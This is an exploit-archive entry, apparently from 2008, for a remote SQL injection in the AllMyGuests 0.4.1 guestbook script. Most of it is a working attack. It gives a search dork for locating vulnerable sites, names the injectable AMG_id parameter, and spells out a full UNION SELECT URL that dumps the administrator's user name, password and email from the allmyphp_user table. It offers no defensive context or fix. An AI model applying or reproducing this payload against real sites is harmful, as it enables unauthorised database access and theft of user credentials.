AllMyGuests <= 0.4.1 (AMG_id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AllMyGuests <= 0.4.1 (AMG_id) Remote SQL Injection Vulnerability
# Published : 2008-04-19
# Author : Player
# Previous Title : Acidcat CMS 3.4.1 Multiple Remote Vulnerabilities
# Next Title : PHP-Fusion <= 6.01.14 Remote Blind SQL Injection Exploit

########################################################
#
#  Found by : -=Player=-
#
#  Contacts : 282-246-419 (ICQ)
#
#  Greatz to: Lidloses_Auge, Suicide, enco, Free-Hack
#
########################################################
#
#  Script   : AllMyGuests
#
#  Site     : http://www.php-resource.net/
#
#  Dork        : "powered by AllMyGuests"
#
#  Valnu    : index.php
#
#  Parameter: AMG_id
#
#  Injection: index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
#
#  Example  : http://site.de/allmyguest/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
#
########################################################

# www.Syue.com [2008-04-19]